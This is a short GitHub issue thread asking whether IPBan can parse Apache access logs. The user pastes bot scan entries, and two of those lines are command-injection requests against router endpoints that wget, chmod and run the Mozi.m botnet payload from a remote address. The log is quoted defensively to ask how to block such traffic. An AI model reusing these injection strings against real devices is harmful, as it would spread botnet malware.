### ISSUE TITLE
Possible to add Apache logs to IPBan?

### ISSUE THREAD

**Issue by s-bourdon** [DigitalRuby/IPBan#137]
Hello,

I've just setup a WAMP server (https://www.uniformserver.com/) on my Windows 10 computer and was wondering if IPBan could help me secure it.  I would like to add Apache logs to IPBan (which are located at «D:\Logiciels\UniServerZ\core\apache2\logs\access.log»).

Since MySQL and phpmyadmin are only accessible locally, there are no failed login attempts in the logs. What bothers me though are the following lines that are probably executed by bots looking for vulnerabilities in web servers:

XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:11 -0500] "Gh0st\xad" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "HELP" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:15 -0500] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 226
XXX.XXX.XXX.XXX - - [10/Mar/2021:23:43:17 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:07 -0500] "GET /wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:23 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:35 -0500] "GET /blog/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:29:50 -0500] "GET /wp/wp-login.php HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:00:45:05 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://XXX.XXX.XXX.XXX:47037/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 3167
XXX.XXX.XXX.XXX - - [11/Mar/2021:02:19:15 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:56 -0500] "GET /a2billing/customer/templates/default/footer.tpl HTTP/1.1" 404 1183
XXX.XXX.XXX.XXX - - [11/Mar/2021:03:43:58 -0500] "\x16\x03\x01" 400 226
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:08:37 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:04:34:03 -0500] "GET /recordings/ HTTP/1.1" 301 -
XXX.XXX.XXX.XXX - - [11/Mar/2021:05:18:43 -0500] "GET /vtigercrm/vtigerservice.php HTTP/1.1" 301 -XXX.XXX.XXX.XXX - - [11/Mar/2021:06:01:32 -0500] "GET /about.php HTTP/1.1" 301 -

etc.

Could IPBan help with this?

Thank you very much for your time!

**Comment by jjxtra** [comment]
Moved to https://github.com/DigitalRuby/IPBan/discussions/140
